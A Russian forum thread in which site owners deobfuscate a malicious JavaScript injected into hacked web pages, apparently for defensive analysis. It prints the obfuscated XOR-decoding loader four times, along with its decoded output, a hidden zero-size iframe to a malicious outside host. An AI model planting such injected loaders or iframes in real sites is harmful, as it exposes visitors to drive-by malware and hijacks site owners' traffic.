как понять что делает внедренный на сайт зло-скрипт

Тема в разделе "Другие языки", создана пользователем marvinz, 21 июл 2009.

Статус темы:
Закрыта.
Модераторы: Цукер
  1. marvinz

    marvinz

    Регистр.:
    7 апр 2009
    Сообщения:
    163
    Симпатии:
    75
    На написание этого поста натолкнула тема http://www.nulled.ws/showthread.php?t=135944 но т.к. я не имею достаточного количества постов, то напишу мини-инструкцию как самому разобраться с данными зло-скриптами в этой теме (надеюсь это вам поможет и поднимет общий уровень грамотности:(

    имеем - злой зашифрованный скрипт засунутый вам на страницы.
    хотим - понять что он делает (после быстрого вычищения со своих страниц)
    что делать -

    1) копируем себе в блокнот скрипт
    2) понимаем что необходимо выполнить деобфускацию кода
    3) качаем специальную программу для исследования вредоносного кода с соусфорджа: http://sourceforge.net/projects/malzilla/files/
    4) запихиваем туда скрипт, нажимаем конпку send all scripts to decoder
    5) пытаемся декодировать

    на примере скрипта из той ветки - декодировать сразу не вышло, ругалось на запрещенные символы, посмотрев код (помогает кнопка Format code) понял что нужно убрать слеши из вызовов функций и закоментил соотв переменные вот так:
    Код:
    function OIOO10lOl1O1O00lII1IOlOIOO11IlIOllIl1111(I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01)
     {
       var II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO=I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01.length,lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O=1024,l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l,IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O,O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0,II110l0lO00lOOll0I01111O1O0IIl0ll0IOl1lO=0,l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII=0,O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O=0,IIll1OOIOOI0lOI1lIlOIl0ll11lIIlOOlI0I0lI=Array(63,3,50,51,57,55,35,16,27,21,0,0,0,0,0,0,14,44,60,13,22,19,43,37,30,23,59,53,49,31,56,9,29,12,45,18,7,8,42,38,6,34,17,0,0,0,0,52,0,4,39,28,40,41,0,46,48,1,47,2,10,54,5,58,36,25,26,61,15,32,33,24,62,20,11);
       for(IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O=Math.ceil(II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO/lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O);
       IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O>0;
       IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O--)
       {
      //   O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0=\'\';
         for(l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l=Math.min(II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO,lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O);
         l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l>0;
         l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l--,II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO--)
         {
           O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O|=(IIll1OOIOOI0lOI1lIlOIl0ll11lIIlOOlI0I0lI[I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01.charCodeAt(II110l0lO00lOOll0I01111O1O0IIl0ll0IOl1lO++)-48])<<l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII;
           if(l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII)
           {
             O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0+=String.fromCharCode(165^O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O&255);
             O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O>>=8;
             l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII-=2
           }
           else
           {
             l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII=6
           }
           
         }
         document.write(O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0)
       }
       
     }
     OIOO10lOl1O1O00lII1IOlOIOO11IlIOllIl1111("q2BhIEQ2fIdKI8QWTmc_ZIsblVNKlFB2DjdLzFdKl2B2zrAhQFqhftQL7bc_TDd_QTc_C64v9HwvC1Q3k5c_wHwGTDdKZ3P2f64vi3AK9bQLc042ljQhTgqWl2BhIEQ2fjO")
    function OIOO10lOl1O1O00lII1IOlOIOO11IlIOllIl1111(I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01)
     {
       var II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO=I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01.length,lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O=1024,l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l,IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O,O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0,II110l0lO00lOOll0I01111O1O0IIl0ll0IOl1lO=0,l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII=0,O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O=0,IIll1OOIOOI0lOI1lIlOIl0ll11lIIlOOlI0I0lI=Array(63,3,50,51,57,55,35,16,27,21,0,0,0,0,0,0,14,44,60,13,22,19,43,37,30,23,59,53,49,31,56,9,29,12,45,18,7,8,42,38,6,34,17,0,0,0,0,52,0,4,39,28,40,41,0,46,48,1,47,2,10,54,5,58,36,25,26,61,15,32,33,24,62,20,11);
       for(IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O=Math.ceil(II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO/lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O);
       IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O>0;
       IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O--)
       {
      //   O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0=\'\';
         for(l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l=Math.min(II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO,lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O);
         l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l>0;
         l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l--,II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO--)
         {
           O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O|=(IIll1OOIOOI0lOI1lIlOIl0ll11lIIlOOlI0I0lI[I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01.charCodeAt(II110l0lO00lOOll0I01111O1O0IIl0ll0IOl1lO++)-48])<<l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII;
           if(l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII)
           {
             O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0+=String.fromCharCode(165^O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O&255);
             O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O>>=8;
             l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII-=2
           }
           else
           {
             l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII=6
           }
           
         }
         document.write(O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0)
       }
       
     }
     OIOO10lOl1O1O00lII1IOlOIOO11IlIOllIl1111("q2BhIEQ2fIdKI8QWTmc_ZIsblVNKlFB2DjdLzFdKl2B2zrAhQFqhftQL7bc_TDd_QTc_C64v9HwvC1Q3k5c_wHwGTDdKZ3P2f64vi3AK9bQLc042ljQhTgqWl2BhIEQ2fjO")
    function OIOO10lOl1O1O00lII1IOlOIOO11IlIOllIl1111(I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01)
     {
       var II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO=I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01.length,lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O=1024,l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l,IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O,O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0,II110l0lO00lOOll0I01111O1O0IIl0ll0IOl1lO=0,l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII=0,O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O=0,IIll1OOIOOI0lOI1lIlOIl0ll11lIIlOOlI0I0lI=Array(63,3,50,51,57,55,35,16,27,21,0,0,0,0,0,0,14,44,60,13,22,19,43,37,30,23,59,53,49,31,56,9,29,12,45,18,7,8,42,38,6,34,17,0,0,0,0,52,0,4,39,28,40,41,0,46,48,1,47,2,10,54,5,58,36,25,26,61,15,32,33,24,62,20,11);
       for(IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O=Math.ceil(II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO/lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O);
       IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O>0;
       IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O--)
       {
       //  O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0=\'\';
         for(l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l=Math.min(II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO,lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O);
         l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l>0;
         l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l--,II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO--)
         {
           O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O|=(IIll1OOIOOI0lOI1lIlOIl0ll11lIIlOOlI0I0lI[I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01.charCodeAt(II110l0lO00lOOll0I01111O1O0IIl0ll0IOl1lO++)-48])<<l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII;
           if(l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII)
           {
             O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0+=String.fromCharCode(165^O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O&255);
             O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O>>=8;
             l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII-=2
           }
           else
           {
             l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII=6
           }
           
         }
         document.write(O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0)
       }
       
     }
     OIOO10lOl1O1O00lII1IOlOIOO11IlIOllIl1111("q2BhIEQ2fIdKI8QWTmc_ZIsblVNKlFB2DjdLzFdKl2B2zrAhQFqhftQL7bc_TDd_QTc_C64v9HwvC1Q3k5c_wHwGTDdKZ3P2f64vi3AK9bQLc042ljQhTgqWl2BhIEQ2fjO")
    function OIOO10lOl1O1O00lII1IOlOIOO11IlIOllIl1111(I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01)
     {
       var II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO=I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01.length,lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O=1024,l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l,IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O,O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0,II110l0lO00lOOll0I01111O1O0IIl0ll0IOl1lO=0,l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII=0,O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O=0,IIll1OOIOOI0lOI1lIlOIl0ll11lIIlOOlI0I0lI=Array(63,3,50,51,57,55,35,16,27,21,0,0,0,0,0,0,14,44,60,13,22,19,43,37,30,23,59,53,49,31,56,9,29,12,45,18,7,8,42,38,6,34,17,0,0,0,0,52,0,4,39,28,40,41,0,46,48,1,47,2,10,54,5,58,36,25,26,61,15,32,33,24,62,20,11);
       for(IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O=Math.ceil(II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO/lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O);
       IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O>0;
       IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O--)
       {
    //     O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0=\'\';
         for(l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l=Math.min(II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO,lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O);
         l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l>0;
         l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l--,II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO--)
         {
           O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O|=(IIll1OOIOOI0lOI1lIlOIl0ll11lIIlOOlI0I0lI[I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01.charCodeAt(II110l0lO00lOOll0I01111O1O0IIl0ll0IOl1lO++)-48])<<l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII;
           if(l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII)
           {
             O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0+=String.fromCharCode(165^O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O&255);
             O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O>>=8;
             l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII-=2
           }
           else
           {
             l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII=6
           }
           
         }
         document.write(O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0)
       }
       
     }
     OIOO10lOl1O1O00lII1IOlOIOO11IlIOllIl1111("q2BhIEQ2fIdKI8QWTmc_ZIsblVNKlFB2DjdLzFdKl2B2zrAhQFqhftQL7bc_TDd_QTc_C64v9HwvC1Q3k5c_wHwGTDdKZ3P2f64vi3AK9bQLc042ljQhTgqWl2BhIEQ2fjO")
    и на выходе получил:
    Код:
    undefined<iframe src="http://roons.cn/s/in.cgi?default" width="0" height="0" style="display:none"></iframe>undefined<iframe src="http://roons.cn/s/in.cgi?default" width="0" height="0" style="display:none"></iframe>undefined<iframe src="http://roons.cn/s/in.cgi?default" width="0" height="0" style="display:none"></iframe>undefined<iframe src="http://roons.cn/s/in.cgi?default" width="0" height="0" style="display:none"></iframe>
    таким образом мы понимаем что действительно зло скрипт обращается именно к той странице что и была указана многоуважаемым tostrss :)

    Спасибо за внимание!:ay:
     
  2. ask0n

    ask0n

    Регистр.:
    9 июн 2009
    Сообщения:
    227
    Симпатии:
    63
    При запуске малзилла ругается:
    malzilla.JPG
    Может поэтому декодировать приведенный кусок текста с комментариями отказывается :(
     
  3. marvinz

    marvinz

    Регистр.:
    7 апр 2009
    Сообщения:
    163
    Симпатии:
    75
    ask0n, а на какой операционке пробовал? На моем ноутбуке стоит Виста, запустилось без проблем.

    погуглил твою длл-ку, попробуй например отсюда скачать:
    http://www.dlldump.com/download-dll-files_new.php/dllfiles/L/libeay32.dll/-/download.html
    хотя не знаю стоит ли ее качать из неизвестных мест.
     
  4. ask0n

    ask0n

    Регистр.:
    9 июн 2009
    Сообщения:
    227
    Симпатии:
    63
    я на XP пробовал, сама прога запускается, не смотря на ругательства, а вот с декодом траблы.
    Щас попробую на виртуалке с этой библиотекой еще запустить.
     
  5. Toha20072008

    Toha20072008

    Заблокирован
    Регистр.:
    17 фев 2008
    Сообщения:
    316
    Симпатии:
    50
    И что мне это даёт - что даёт понимание того что этот скрипт открывает мне на странице?
     
  6. marvinz

    marvinz

    Регистр.:
    7 апр 2009
    Сообщения:
    163
    Симпатии:
    75
    Тоша, если тебя взломали и ты знаешь куда идет трафик то ты можешь написать хостеру того человека куда идет трафик (конечно хостер может ничего не придпринимать, но обычно такие письма приносят свой положительный результат), ведь если тот зло-сайт закроют, то не будет смысла снова взламывать тебя, т.к. того сайта уже не будет. (конечно если ты не разберешься как и кто тебя ломает, то восстановление из бекапов станет твоей второй жизнью, а написание абьюз писем разным хостерам любимым занятием)

    Желаю успехов с твоим сайтом!
     
  7. gurban

    gurban Писатель

    Регистр.:
    20 сен 2009
    Сообщения:
    9
    Симпатии:
    0
    уже пару раз меня подобным образом ломали. Есть теория что пароли от фтп крали не прями с компа а где то на маршрутизаторах отлавливали.

    Как правило после расшифровки кода я обнаруживал сыылку на вредоносный сайт в Китае.
     
  8. Onu

    Onu Постоялец

    Регистр.:
    4 июн 2008
    Сообщения:
    80
    Симпатии:
    16
    Это позволяет вредоносному сайту открываться внутри твоего сайта, несколько раз. У него траффик увеличивается, а тебя поисковик банит в это время :( + пользователь может вирус подцепить с этого сайта.
     
Статус темы:
Закрыта.